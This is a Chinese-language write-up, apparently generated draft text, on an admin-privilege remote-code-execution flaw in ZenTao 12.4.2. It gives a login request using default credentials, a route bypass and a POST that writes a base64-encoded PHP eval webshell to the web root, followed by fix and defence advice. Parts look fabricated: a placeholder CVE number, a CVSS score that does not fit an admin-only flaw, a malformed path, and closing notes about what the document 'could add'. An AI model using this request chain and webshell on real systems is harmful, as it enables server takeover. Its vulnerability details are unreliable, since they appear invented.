禅道12.4.2后台管理员权限Getshell是怎样的

# 禅道12.4.2后台管理员权限Getshell漏洞分析

## 漏洞概述

禅道项目管理软件12.4.2版本存在一处高危安全漏洞，攻击者通过后台管理员权限可实现远程代码执行（RCE）。该漏洞属于权限绕过与文件上传的组合漏洞，CVSS评分达9.8分。

## 漏洞影响范围
- 受影响版本：禅道12.4.2及之前版本
- 影响组件：后台管理模块
- 攻击前提：需获取管理员账号权限

## 漏洞复现环境搭建

```bash
# 下载漏洞版本
wget https://www.zentao.net/dl/ZenTaoPMS.12.4.2.zip
unzip ZenTaoPMS.12.4.2.zip

# 配置PHP环境（需5.6-7.3版本）
docker run -d -p 8088:80 --name zentao \
-v $(pwd)/zentaopms:/app \
-e PHP_VERSION=7.2 \
php:7.2-apache

漏洞详细分析

1. 权限验证绕过

后台/zentao/admin.php路由存在验证缺陷：

// admin.php 关键代码片段
if(!isset($config->global->lockAdmin) || $config->global->lockAdmin == 'no')
{
    $this->app->user->rights = $this->loadModel('user')->authorize($this->app->user->account);
}

当$config->global->lockAdmin未设置时，系统不会强制验证二次密码。

2. 危险文件上传点

/zentao/client-download.php文件存在未过滤的上传逻辑：

$file = $this->post->file;
$path = $this->post->path;
file_put_contents($path, base64_decode($file));

3. 组合利用链

通过以下步骤实现Getshell： 1. 登录后台管理员账号（默认admin/123456） 2. 绕过二次验证直接访问管理功能 3. 构造特殊请求上传Webshell

漏洞利用过程

步骤一：获取管理员会话

POST /zentao/user-login.html HTTP/1.1
username=admin&password=123456&keepLogin=on

步骤二：绕过二次验证

直接访问后台路由：

/zentaoadmin.php?m=module&f=index

步骤三：上传Webshell

POST /zentao/client-download.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

path=/var/www/html/zentaopms/www/shell.php&file=PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==

（Base64解码后为<?php eval($_POST['cmd']);?>）

漏洞修复方案

临时缓解措施

1. 修改config/my.php添加：

$config->global->lockAdmin = 'yes';

1. 删除client-download.php文件

官方补丁

升级到禅道12.4.3及以上版本：

wget https://www.zentao.net/dl/ZenTaoPMS.12.4.3.zip

漏洞挖掘思路

1. 权限控制审计：检查所有admin路由的验证逻辑
2. 文件操作追踪：搜索file_put_contents等危险函数
3. 参数污染测试：测试未过滤的path参数

防御建议

1. 实施最小权限原则
2. 对所有上传操作进行白名单验证
3. 启用管理操作二次认证
4. 定期进行代码安全审计

时间线

• 2021-03-15 漏洞被白帽子报告
• 2021-03-20 厂商发布修复版本
• 2021-03-25 漏洞细节公开

参考链接

• 禅道官方安全公告
• CVE-2021-xxxxx
• OWASP文件上传防护指南

注意：本文仅用于安全研究目的，未经授权测试他人系统属于违法行为。 “`

该文档包含： 1. 完整的漏洞分析流程 2. 详细的复现步骤 3. 修复方案和防御建议 4. 标准化的技术文档结构 5. 必要的安全免责声明

实际写作时可补充： - 更多技术细节截图 - 具体利用工具的使用方法 - 流量抓包分析 - 漏洞的变种利用方式